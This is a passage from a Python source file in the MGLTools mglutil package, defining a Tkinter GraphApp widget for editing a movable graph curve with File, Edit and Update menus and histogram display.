    dev_set - List of list of words corresponding with each review that we are testing on
              It follows the same format as train_set
    bigram_lambda - float between 0 and 1
    unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1)
    bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1)
    pos_prior - positive prior probability (between 0 and 1)

    Returns the predicted 0/1 labels for dev_set; also writes diagnostic
    classifications of imessage_batch to pos.txt / neg.txt as a side effect.
    NOTE(review): the `imessages` parameter is never used.
    """
    positive_counter = Counter()
    negative_counter = Counter()
    # NOTE(review): the two review totals below are never used.
    total_num_pos_reviews = 0
    total_num_neg_reviews = 0
    total_pos_words = 0
    total_neg_words = 0
    pos_bigram_counter = Counter()
    neg_bigram_counter = Counter()
    total_pos_bigrams = 0
    total_neg_bigrams = 0
    cross_idx = 0
    # Training pass: per-class unigram and bigram counts (label 1 = positive).
    for review in train_set:
        wordlist = set()
        for word in review:
            if train_labels[cross_idx] == 1:
                positive_counter[word] += 1
                total_pos_words += 1
            elif train_labels[cross_idx] == 0:
                negative_counter[word] += 1
                total_neg_words += 1
            wordlist.add(word)
        for bigram in nltk.bigrams(review):
            if train_labels[cross_idx] == 1:
                pos_bigram_counter[bigram] += 1
                total_pos_bigrams += 1
            elif train_labels[cross_idx] == 0:
                neg_bigram_counter[bigram] += 1
                total_neg_bigrams += 1
        cross_idx += 1
    dev_labels = []
    pos_count = 0
    neg_count = 0
    # Classification pass over the dev set, accumulating log-probabilities
    # for the lambda-weighted unigram/bigram mixture.
    for review in dev_set:
        positive_unig_prob = math.log(pos_prior)
        positive_unig_prob += math.log(1 - bigram_lambda)
        positive_bi_prob = math.log(bigram_lambda)
        positive_bi_prob += math.log(pos_prior)
        negative_unig_prob = math.log(1 - pos_prior)
        negative_unig_prob += math.log(1 - bigram_lambda)
        negative_bi_prob = math.log(bigram_lambda)
        negative_bi_prob += math.log(1 - pos_prior)
        # NOTE(review): log(bigram_lambda) is added to negative_bi_prob a
        # second time here, which is asymmetric with the positive class —
        # confirm whether this is intentional.
        negative_bi_prob += math.log(bigram_lambda)
        for word in review:
            # Laplace-smoothed unigram log-likelihoods.
            positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
                                / (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
            negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
                                / (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
        for bigram in nltk.bigrams(review):
            # Laplace-smoothed bigram log-likelihoods.
            positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
                                / (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
            negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
                                / (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
        if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
            dev_labels.append(1)
            pos_count += 1
        else:
            dev_labels.append(0)
            neg_count += 1
    positive_texts = []
    negative_texts = []
    all_texts = []
    pos_count = 0
    neg_count = 0
    # NOTE(review): the pos_prior argument is overridden here for the
    # imessage diagnostics — confirm the hard-coded .6 is intended.
    pos_prior = .6
    # Second pass: classify imessage_batch (tuples of (tokens, metadata))
    # with the same model, collecting the texts for the diagnostic files.
    for message in imessage_batch:
        positive_unig_prob = math.log(pos_prior)
        positive_unig_prob += math.log(1 - bigram_lambda)
        positive_bi_prob = math.log(bigram_lambda)
        positive_bi_prob += math.log(pos_prior)
        negative_unig_prob = math.log(1 - pos_prior)
        negative_unig_prob += math.log(1 - bigram_lambda)
        negative_bi_prob = math.log(bigram_lambda)
        negative_bi_prob += math.log(1 - pos_prior)
        # NOTE(review): same doubled log(bigram_lambda) as above.
        negative_bi_prob += math.log(bigram_lambda)
        for word in message[0]:
            positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
                                / (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
            negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
                                / (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
        for bigram in nltk.bigrams(message[0]):
            positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
                                / (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
            negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
                                / (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
        if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
            # NOTE(review): operator precedence makes this margin
            # pos_u + pos_b - neg_b + neg_u rather than
            # (pos_u + pos_b) - (neg_u + neg_b); the intended expression
            # probably needs parentheses around the negative terms — confirm.
            positive_texts.append((abs(positive_unig_prob + positive_bi_prob - negative_bi_prob + negative_unig_prob), message[0], message[1]))
            all_texts.append((1, message[0], message[1]))
            pos_count += 1
        else:
            negative_texts.append((abs(positive_unig_prob + positive_bi_prob - negative_bi_prob + negative_unig_prob), message[0], message[1]))
            all_texts.append((-1, message[0], message[1]))
            neg_count += 1
    # Write the most confidently classified texts first.
    positive_texts = sorted(positive_texts, key=lambda text: text[0], reverse=True)
    negative_texts = sorted(negative_texts, key=lambda text: text[0], reverse=True)
    with open('pos.txt', 'w+', encoding='utf-8') as o:
        for i in positive_texts:
            o.write(""+ str(i[0]) + " " + " ".join(i[1]) + "\n")
        # NOTE(review): redundant — the `with` block already closes the file.
        o.close()
    with open('neg.txt', 'w+', encoding='utf-8') as o:
        for i in negative_texts:
            o.write("" + str(i[0]) + " " + " ".join(i[1]) + "\n")
        o.close()
    #print(sorted(positive_texts, key=lambda text: text[0])[:100])
    #print(sorted(negative_texts, key=lambda text: text[0])[:100])
    # return predicted labels of development set (make sure it's a list, not a numpy array or similar)
    return dev_labels
def naiveBayesMixtureSent140(train_set, train_labels, dev_set, bigram_lambda,unigram_smoothing_parameter, bigram_smoothing_parameter, pos_prior):
    """
    train_set - List of list of words corresponding with each movie review
    example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set
    Then train_set := [['like','this','movie'], ['i','fall','asleep']]
    train_labels - List of labels corresponding with train_set
    example: Suppose I had two reviews, first one was positive and second one was negative.
    Then train_labels := [1, 0]
    dev_set - List of list of words corresponding with each review that we are testing on
              It follows the same format as train_set
    bigram_lambda - float between 0 and 1
    unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1)
    bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1)
    pos_prior - positive prior probability (between 0 and 1)

    Sentiment140 variant: positive label is 4, negative is 0; returns the
    predicted 0/4 labels for dev_set.
    """
    positive_counter = Counter()
    negative_counter = Counter()
    # NOTE(review): the two review totals below are never used.
    total_num_pos_reviews = 0
    total_num_neg_reviews = 0
    total_pos_words = 0
    total_neg_words = 0
    pos_bigram_counter = Counter()
    neg_bigram_counter = Counter()
    total_pos_bigrams = 0
    total_neg_bigrams = 0
    # NOTE(review): the pos_prior argument is silently overridden with .5
    # here, so the parameter has no effect — confirm this is intended.
    pos_prior = .5
    cross_idx = 0
    # Training pass: per-class unigram/bigram counts (label 4 = positive).
    for review in tqdm(train_set):
        wordlist = set()
        for word in review:
            if train_labels[cross_idx] == 4:
                positive_counter[word] += 1
                total_pos_words += 1
            elif train_labels[cross_idx] == 0:
                negative_counter[word] += 1
                total_neg_words += 1
            wordlist.add(word)
        for bigram in nltk.bigrams(review):
            if train_labels[cross_idx] == 4:
                pos_bigram_counter[bigram] += 1
                total_pos_bigrams += 1
            elif train_labels[cross_idx] == 0:
                neg_bigram_counter[bigram] += 1
                total_neg_bigrams += 1
        cross_idx += 1
    dev_labels = []
    pos_count = 0
    neg_count = 0
    # Classification pass: lambda-weighted unigram/bigram mixture in log space.
    for review in dev_set:
        positive_unig_prob = math.log(pos_prior)
        positive_unig_prob += math.log(1 - bigram_lambda)
        positive_bi_prob = math.log(bigram_lambda)
        positive_bi_prob += math.log(pos_prior)
        negative_unig_prob = math.log(1 - pos_prior)
        negative_unig_prob += math.log(1 - bigram_lambda)
        negative_bi_prob = math.log(bigram_lambda)
        negative_bi_prob += math.log(1 - pos_prior)
        # NOTE(review): log(bigram_lambda) is added to negative_bi_prob a
        # second time here, asymmetric with the positive class — confirm.
        negative_bi_prob += math.log(bigram_lambda)
        for word in review:
            # Laplace-smoothed unigram log-likelihoods.
            positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
                                / (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
            negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
                                / (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
        for bigram in nltk.bigrams(review):
            # Laplace-smoothed bigram log-likelihoods.
            positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
                                / (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
            negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
                                / (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
        if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
            dev_labels.append(4)
            pos_count += 1
        else:
            dev_labels.append(0)
            neg_count += 1
    return dev_labels
|
# naive_bayes.py
# ---------------
# Licensing Information: You are free to use or extend this projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to the University of Illinois at Urbana-Champaign
#
# Created by <NAME> (<EMAIL>) on 09/28/2018
# Modified by <NAME> 02/02/2020
"""
This is the main entry point for Part 2 of this MP. You should only modify code
within this file for Part 2 -- the unrevised staff files will be used for all other
files and classes when code is run, so be careful to not modify anything else.
"""
import numpy as numpy
import math
from collections import Counter
import nltk
#import pudb; pu.db
from tqdm import tqdm
def naiveBayesMixture(train_set, train_labels, dev_set, imessages, imessage_batch, bigram_lambda,unigram_smoothing_parameter, bigram_smoothing_parameter, pos_prior):
"""
train_set - List of list of words corresponding with each movie review
example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set
Then train_set := [['like','this','movie'], ['i','fall','asleep']]
train_labels - List of labels corresponding with train_set
example: Suppose I had two reviews, first one was positive and second one was negative.
Then train_labels := [1, 0]
dev_set - List of list of words corresponding with each review that we are testing on
It follows the same format as train_set
bigram_lambda - float between 0 and 1
unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1)
bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1)
pos_prior - positive prior probability (between 0 and 1)
"""
positive_counter = Counter()
negative_counter = Counter()
total_num_pos_reviews = 0
total_num_neg_reviews = 0
total_pos_words = 0
total_neg_words = 0
pos_bigram_counter = Counter()
neg_bigram_counter = Counter()
total_pos_bigrams = 0
total_neg_bigrams = 0
cross_idx = 0
for review in train_set:
wordlist = set()
for word in review:
if train_labels[cross_idx] == 1:
positive_counter[word] += 1
total_pos_words += 1
elif train_labels[cross_idx] == 0:
negative_counter[word] += 1
total_neg_words += 1
wordlist.add(word)
for bigram in nltk.bigrams(review):
if train_labels[cross_idx] == 1:
pos_bigram_counter[bigram] += 1
total_pos_bigrams += 1
elif train_labels[cross_idx] == 0:
neg_bigram_counter[bigram] += 1
total_neg_bigrams += 1
cross_idx += 1
dev_labels = []
pos_count = 0
neg_count = 0
for review in dev_set:
positive_unig_prob = math.log(pos_prior)
positive_unig_prob += math.log(1 - bigram_lambda)
positive_bi_prob = math.log(bigram_lambda)
positive_bi_prob += math.log(pos_prior)
negative_unig_prob = math.log(1 - pos_prior)
negative_unig_prob += math.log(1 - bigram_lambda)
negative_bi_prob = math.log(bigram_lambda)
negative_bi_prob += math.log(1 - pos_prior)
negative_bi_prob += math.log(bigram_lambda)
for word in review:
positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
/ (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
/ (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
for bigram in nltk.bigrams(review):
positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
dev_labels.append(1)
pos_count += 1
else:
dev_labels.append(0)
neg_count += 1
positive_texts = []
negative_texts = []
all_texts = []
pos_count = 0
neg_count = 0
pos_prior = .6
for message in imessage_batch:
positive_unig_prob = math.log(pos_prior)
positive_unig_prob += math.log(1 - bigram_lambda)
positive_bi_prob = math.log(bigram_lambda)
positive_bi_prob += math.log(pos_prior)
negative_unig_prob = math.log(1 - pos_prior)
negative_unig_prob += math.log(1 - bigram_lambda)
negative_bi_prob = math.log(bigram_lambda)
negative_bi_prob += math.log(1 - pos_prior)
negative_bi_prob += math.log(bigram_lambda)
for word in message[0]:
positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter)
/ (total_pos_words + (unigram_smoothing_parameter * len(positive_counter.keys()))))
negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter)
/ (total_neg_words + (unigram_smoothing_parameter * len(negative_counter.keys()))))
for bigram in nltk.bigrams(message[0]):
positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_pos_bigrams + (bigram_smoothing_parameter * len(pos_bigram_counter.keys()))))
negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter)
/ (total_neg_bigrams + (bigram_smoothing_parameter * len(neg_bigram_counter.keys()))))
if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
positive_texts.append((abs(positive_unig_prob + positive_bi_prob - negative_bi_prob + negative_unig_prob), message[0], message[1]))
all_texts.append((1, message[0], message[1]))
pos_count += 1
else:
negative_texts.append((abs(positive_unig_prob + positive_bi_prob - negative_bi_prob + negative_unig_prob), message[0], message[1]))
all_texts.append((-1, message[0], message[1]))
neg_count += 1
positive_texts = sorted(positive_texts, key=lambda text: text[0], reverse=True)
negative_texts = sorted(negative_texts, key=lambda text: text[0], reverse=True)
with open('pos.txt', 'w+', encoding='utf-8') as o:
for i in positive_texts:
o.write(""+ str(i[0]) + " " + " ".join(i[1]) + "\n")
o.close()
with open('neg.txt', 'w+', encoding='utf-8') as o:
for i in negative_texts:
o.write("" + str(i[0]) + " " + " ".join(i[1]) + "\n")
o.close()
#print(sorted(positive_texts, key=lambda text: text[0])[:100])
#print(sorted(negative_texts, key=lambda text: text[0])[:100])
# return predicted labels of development set (make sure it's a list, not a numpy array or similar)
return dev_labels
def naiveBayesMixtureSent140(train_set, train_labels, dev_set, bigram_lambda,unigram_smoothing_parameter, bigram_smoothing_parameter, pos_prior):
    """
    Mixture unigram/bigram naive Bayes classifier for the Sentiment140 label
    scheme (0 = negative, 4 = positive).

    train_set - list of tokenized tweets (list of list of words)
    train_labels - list of labels (0 or 4) parallel to train_set
    dev_set - list of tokenized tweets to classify
    bigram_lambda - mixture weight of the bigram model (0 < lambda < 1)
    unigram_smoothing_parameter - Laplace smoothing for the unigram model
    bigram_smoothing_parameter - Laplace smoothing for the bigram model
    pos_prior - positive prior probability (overridden to 0.5 below)

    Returns a list of predicted labels (0 or 4), one per dev_set entry.
    """
    def _bigrams(words):
        # Consecutive word pairs; identical to nltk.bigrams for list input.
        return zip(words, words[1:])

    positive_counter = Counter()
    negative_counter = Counter()
    total_pos_words = 0
    total_neg_words = 0
    pos_bigram_counter = Counter()
    neg_bigram_counter = Counter()
    total_pos_bigrams = 0
    total_neg_bigrams = 0
    # NOTE: the caller-supplied prior is deliberately replaced by a flat prior.
    pos_prior = .5
    # --- training: per-class unigram and bigram counts ---
    for idx, review in enumerate(train_set):
        label = train_labels[idx]
        for word in review:
            if label == 4:
                positive_counter[word] += 1
                total_pos_words += 1
            elif label == 0:
                negative_counter[word] += 1
                total_neg_words += 1
        for bigram in _bigrams(review):
            if label == 4:
                pos_bigram_counter[bigram] += 1
                total_pos_bigrams += 1
            elif label == 0:
                neg_bigram_counter[bigram] += 1
                total_neg_bigrams += 1
    # Hoist the Laplace-smoothing denominators out of the scoring loops;
    # they are loop invariants.
    pos_unig_denom = total_pos_words + unigram_smoothing_parameter * len(positive_counter)
    neg_unig_denom = total_neg_words + unigram_smoothing_parameter * len(negative_counter)
    pos_bi_denom = total_pos_bigrams + bigram_smoothing_parameter * len(pos_bigram_counter)
    neg_bi_denom = total_neg_bigrams + bigram_smoothing_parameter * len(neg_bigram_counter)
    # --- classification of the dev set ---
    dev_labels = []
    for review in dev_set:
        positive_unig_prob = math.log(pos_prior) + math.log(1 - bigram_lambda)
        negative_unig_prob = math.log(1 - pos_prior) + math.log(1 - bigram_lambda)
        positive_bi_prob = math.log(pos_prior) + math.log(bigram_lambda)
        # BUGFIX: the original added math.log(bigram_lambda) twice on the
        # negative side, biasing every decision toward the positive class.
        negative_bi_prob = math.log(1 - pos_prior) + math.log(bigram_lambda)
        for word in review:
            positive_unig_prob += math.log((positive_counter[word] + unigram_smoothing_parameter) / pos_unig_denom)
            negative_unig_prob += math.log((negative_counter[word] + unigram_smoothing_parameter) / neg_unig_denom)
        for bigram in _bigrams(review):
            positive_bi_prob += math.log((pos_bigram_counter[bigram] + bigram_smoothing_parameter) / pos_bi_denom)
            negative_bi_prob += math.log((neg_bigram_counter[bigram] + bigram_smoothing_parameter) / neg_bi_denom)
        if positive_unig_prob + positive_bi_prob > negative_unig_prob + negative_bi_prob:
            dev_labels.append(4)
        else:
            dev_labels.append(0)
    return dev_labels
|
en
| 0.864806
|
# naive_bayes.py # --------------- # Licensing Information: You are free to use or extend this projects for # educational purposes provided that (1) you do not distribute or publish # solutions, (2) you retain this notice, and (3) you provide clear # attribution to the University of Illinois at Urbana-Champaign # # Created by <NAME> (<EMAIL>) on 09/28/2018 # Modified by <NAME> 02/02/2020 This is the main entry point for Part 2 of this MP. You should only modify code within this file for Part 2 -- the unrevised staff files will be used for all other files and classes when code is run, so be careful to not modify anything else. #import pudb; pu.db train_set - List of list of words corresponding with each movie review example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set Then train_set := [['like','this','movie'], ['i','fall','asleep']] train_labels - List of labels corresponding with train_set example: Suppose I had two reviews, first one was positive and second one was negative. 
Then train_labels := [1, 0] dev_set - List of list of words corresponding with each review that we are testing on It follows the same format as train_set bigram_lambda - float between 0 and 1 unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1) bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1) pos_prior - positive prior probability (between 0 and 1) #print(sorted(positive_texts, key=lambda text: text[0])[:100]) #print(sorted(negative_texts, key=lambda text: text[0])[:100]) # return predicted labels of development set (make sure it's a list, not a numpy array or similar) train_set - List of list of words corresponding with each movie review example: suppose I had two reviews 'like this movie' and 'i fall asleep' in my training set Then train_set := [['like','this','movie'], ['i','fall','asleep']] train_labels - List of labels corresponding with train_set example: Suppose I had two reviews, first one was positive and second one was negative. Then train_labels := [1, 0] dev_set - List of list of words corresponding with each review that we are testing on It follows the same format as train_set bigram_lambda - float between 0 and 1 unigram_smoothing_parameter - Laplace smoothing parameter for unigram model (between 0 and 1) bigram_smoothing_parameter - Laplace smoothing parameter for bigram model (between 0 and 1) pos_prior - positive prior probability (between 0 and 1)
| 2.976752
| 3
|
config.py
|
rauldatascience/sentiment-analysis
| 2
|
6628507
|
# Location of the tweet dataset (relative path).
DATA_FILEPATH = "data/tweets_100k"
# Serialized model artifacts ("latest" snapshots written by the training run).
FEATURE_EXTRACTOR_FILEPATH = "model/feature_extractor_latest.pk"
CLASSIFIER_FILEPATH = "model/classifier_latest.pk"
# Numeric class label -> human-readable sentiment name
# (Sentiment140-style encoding: 0 = negative, 4 = positive).
LABELS = {
    0: "negative",
    4: "positive"
}
|
DATA_FILEPATH = "data/tweets_100k"
FEATURE_EXTRACTOR_FILEPATH = "model/feature_extractor_latest.pk"
CLASSIFIER_FILEPATH = "model/classifier_latest.pk"
LABELS = {
0: "negative",
4: "positive"
}
|
none
| 1
| 1.246951
| 1
|
|
tests/test_sqlite.py
|
danielerapati/dagobah
| 1
|
6628508
|
""" Tests on the SQLite backend """
import os
import datetime
import json
import yaml
from nose.tools import nottest
from dagobah.core.core import Dagobah
from dagobah.core.components import StrictJSONEncoder
from dagobah.backend.sqlite import SQLiteBackend
class TestSQLite(object):
    """Tests on the SQLite backend of dagobah."""

    @classmethod
    def setup_class(cls):
        """Read test_config.yml and pick the SQLite file path ('memory' on CI)."""
        location = os.path.realpath(os.path.join(os.getcwd(),
                                                 os.path.dirname(__file__)))
        # Context manager guarantees the config file is closed even on error.
        with open(os.path.join(location, 'test_config.yml')) as config_file:
            # safe_load: the config is plain data; yaml.load without an
            # explicit Loader is unsafe and deprecated in PyYAML >= 5.1.
            config = yaml.safe_load(config_file.read())
        if os.getenv('TRAVIS', 'false') == 'true':
            cls.filepath = 'memory'
        else:
            cls.filepath = config.get('SQLiteBackend', {}).\
                get('filepath', 'memory')
        cls.dagobah = None

    @classmethod
    def teardown_class(cls):
        # No shared resources to release.
        pass

    @nottest
    def new_dagobah(self, return_instance=False):
        """Create a SQLite-backed Dagobah; store on self unless return_instance."""
        if not return_instance:
            self.dagobah = Dagobah(SQLiteBackend(self.filepath))
        else:
            return Dagobah(SQLiteBackend(self.filepath))

    def test_decode_json(self):
        """Round-trip a nested doc containing datetimes through the encoder/decoder."""
        self.new_dagobah()
        now = datetime.datetime.now()
        test_doc = {"nested": {"dt": now},
                    "array": [{"dt": now},
                              {"dt2": now,
                               "int": 5},
                              {"str": "woot"}]}
        json_doc = json.dumps(test_doc, cls=StrictJSONEncoder)
        result = self.dagobah.backend.decode_import_json(json_doc)
        # print() with a single argument works under both Python 2 and 3.
        print(test_doc)
        print(result)
        assert result == test_doc
|
""" Tests on the SQLite backend """
import os
import datetime
import json
import yaml
from nose.tools import nottest
from dagobah.core.core import Dagobah
from dagobah.core.components import StrictJSONEncoder
from dagobah.backend.sqlite import SQLiteBackend
class TestSQLite(object):
@classmethod
def setup_class(self):
location = os.path.realpath(os.path.join(os.getcwd(),
os.path.dirname(__file__)))
config_file = open(os.path.join(location, 'test_config.yml'))
config = yaml.load(config_file.read())
config_file.close()
if os.getenv('TRAVIS', 'false') == 'true':
self.filepath = 'memory'
else:
self.filepath = config.get('SQLiteBackend', {}).\
get('filepath', 'memory')
self.dagobah = None
@classmethod
def teardown_class(self):
pass
@nottest
def new_dagobah(self, return_instance=False):
if not return_instance:
self.dagobah = Dagobah(SQLiteBackend(self.filepath))
else:
return Dagobah(SQLiteBackend(self.filepath))
def test_decode_json(self):
self.new_dagobah()
now = datetime.datetime.now()
test_doc = {"nested": {"dt": now},
"array": [{"dt": now},
{"dt2": now,
"int": 5},
{"str": "woot"}]}
json_doc = json.dumps(test_doc, cls=StrictJSONEncoder)
result = self.dagobah.backend.decode_import_json(json_doc)
print test_doc
print result
assert result == test_doc
|
en
| 0.487877
|
Tests on the SQLite backend
| 2.217814
| 2
|
0_Companies/CISCO.py
|
allenalvin333/Hackerrank_Interview
| 2
|
6628509
|
<filename>0_Companies/CISCO.py
# Cisco Preliminary Test
#
# Reads a pattern string S and a list of candidate words, then counts how
# many candidates match S run-by-run.  S is split into maximal runs of a
# repeated character; a candidate matches when, for every run position, its
# run either equals the pattern's run or the run's character repeated three
# times equals the pattern's run.
# S: pattern string; l: candidate words; ini: runs of S; c: match count.
S,l,ini,c,m=input(),list(map(str,input().split())),[],0,0
# Split S into maximal runs of identical characters.
while(m<len(S)):
    x=m
    while(x<len(S)):
        if(S[x]!=S[m]): break
        x+=1
    ini.append(S[m:x])
    m=x
for z in l:
    # k: runs of the current candidate word z (same decomposition as above).
    m,k=0,[]
    while(m<len(z)):
        x=m
        while(x<len(z)):
            if(z[x]!=z[m]): break
            x+=1
        k.append(z[m:x])
        m=x
    # allen: number of run positions where z is compatible with the pattern.
    allen=0
    for y in range(len(k)):
        # if(k[y]==ini[y] or k[y]*3==ini[y]): allen+=1
        # A run matches if equal, or if its character tripled equals the
        # pattern's run.  NOTE(review): a candidate with more runs than the
        # pattern raises IndexError here — presumably inputs guarantee
        # len(k) <= len(ini); confirm against the problem statement.
        if(k[y]==ini[y] or list(set(k[y]))[0]*3==ini[y]): allen+=1
    # The candidate counts only when every one of its runs matched.
    if(allen==len(k)): c+=1
print(c)
|
<filename>0_Companies/CISCO.py
# Cisco Preliminary Test
S,l,ini,c,m=input(),list(map(str,input().split())),[],0,0
while(m<len(S)):
x=m
while(x<len(S)):
if(S[x]!=S[m]): break
x+=1
ini.append(S[m:x])
m=x
for z in l:
m,k=0,[]
while(m<len(z)):
x=m
while(x<len(z)):
if(z[x]!=z[m]): break
x+=1
k.append(z[m:x])
m=x
allen=0
for y in range(len(k)):
# if(k[y]==ini[y] or k[y]*3==ini[y]): allen+=1
if(k[y]==ini[y] or list(set(k[y]))[0]*3==ini[y]): allen+=1
if(allen==len(k)): c+=1
print(c)
|
en
| 0.193141
|
# Cisco Preliminary Test # if(k[y]==ini[y] or k[y]*3==ini[y]): allen+=1
| 3.171659
| 3
|
forms.py
|
gracideas/spekcheck
| 1
|
6628510
|
import os
from flask import request, redirect
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, SubmitField, TextField, MultipleFileField
from wtforms.validators import DataRequired, Length
from werkzeug.utils import secure_filename
# Defines fields for new entry form
class SubmissionForm(FlaskForm):
    """WTForms form for submitting a new entry (ID, source and uploads)."""
    # Must be exactly 36 characters (the length of a UUID-formatted
    # MusicBrainz identifier).
    musicbrainz_album_id = StringField('MusicBrainz ID', validators=[DataRequired(), Length(min=36, max=36)])
    # Free-text source description; at least 5 characters required.
    source = TextField('Source', validators=[DataRequired(), Length(min=5)])
    # One or more uploaded files; at least one is required.
    upload = MultipleFileField('Upload', validators=[FileRequired()])
    submit = SubmitField('Submit')
|
import os
from flask import request, redirect
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, SubmitField, TextField, MultipleFileField
from wtforms.validators import DataRequired, Length
from werkzeug.utils import secure_filename
# Defines fields for new entry form
class SubmissionForm(FlaskForm):
musicbrainz_album_id = StringField('MusicBrainz ID', validators=[DataRequired(), Length(min=36, max=36)])
source = TextField('Source', validators=[DataRequired(), Length(min=5)])
upload = MultipleFileField('Upload', validators=[FileRequired()])
submit = SubmitField('Submit')
|
en
| 0.717982
|
# Defines fields for new entry form
| 2.378799
| 2
|
resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/mglutil/gui/BasicWidgets/Tk/graphtool.py
|
J-E-J-S/aaRS-Pipeline
| 8
|
6628511
|
<reponame>J-E-J-S/aaRS-Pipeline
## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
##############################################################################
#
#
# Authors: <NAME>,<NAME>
#
#
###############################################################################
#
#
#
#
#$Id: graphtool.py,v 1.47 2007/12/04 21:28:04 vareille Exp $
#Graph Tool is a widget with movable graph curve
#app=GraphApp(root)
#app.caluculate_ramp() returns current ramp
#from ViewerFramework.VFCommand import Command, CommandGUI
from Tkinter import *
import Tkinter
import tkFileDialog
import types,os
from mglutil.util.callback import CallBackFunction
from mglutil.util.callback import CallbackManager
from mglutil.util.misc import ensureFontCase
import numpy.oldnumeric as Numeric
from mglutil.gui.BasicWidgets.Tk.thumbwheel import ThumbWheel
import Pmw
from Pmw import *
from mglutil.util.misc import deepCopySeq
class GraphApp:
    # Initialization
    def __init__(self,master=None,callback=None,continuous=1):
        """Build the graph-editor GUI: menubar (File/Edit/Update/Curve),
        sensitivity thumbwheel, Update/Dismiss buttons, and a canvas with
        axes, gray-scale ramps and the initial straight curve.

        master     - parent Tk widget
        callback   - callable (or list of callables) invoked with the ramp
        continuous - 1 to fire callbacks on every drag motion
        """
        self.master=master
        self.callback = None
        self.callbacks = CallbackManager()
        self.canvas=canvas = Canvas(self.master,width=345,height=320,bg='white')
        self.toolbar = Frame(master)  # Create Toolbar
        self.toolbar.pack(side='top', expand=1, fill='both')
        self.menuFrame1 = Tkinter.Frame(self.toolbar, relief='raised', borderwidth=3)
        self.menuFrame1.pack(side='top', expand=1, fill='x')
        # --- File menu: read/write the graph to disk ---
        self.filebutton = Tkinter.Menubutton(self.menuFrame1, text='File')
        self.filebutton.pack(side='left')
        self.filemenu = Tkinter.Menu(self.filebutton, {})
        self.filemenu.add_command(label='Read', command=self.read_cb)
        self.filemenu.add_command(label='Write', command=self.write_cb)
        self.filebutton['menu'] = self.filemenu
        # --- Edit menu: history navigation, default/invert curve, histogram ---
        self.editbutton = Tkinter.Menubutton(self.menuFrame1, text='Edit')
        self.editbutton.pack(side='left', anchor='w')
        self.editmenu = Tkinter.Menu(self.editbutton, {})
        self.editmenu.add_command(label='Reset to first in history', command=self.resetAll_cb)
        self.editmenu.add_command(label='Step back in history loop', command=self.stepBack_cb)
        self.editmenu.add_command(label='Default Curve', command=self.defaultcurve_cb)
        self.editmenu.add_command(label='Invert Curve',command=self.invertGraph)
        self.histvar=IntVar()
        self.histvar.set(1)
        self.editmenu.add_checkbutton(label='Histogram',var=self.histvar,command=self.drawHistogram)
        self.editbutton['menu'] = self.editmenu
        # --- Update menu: when callbacks fire (see calloption) ---
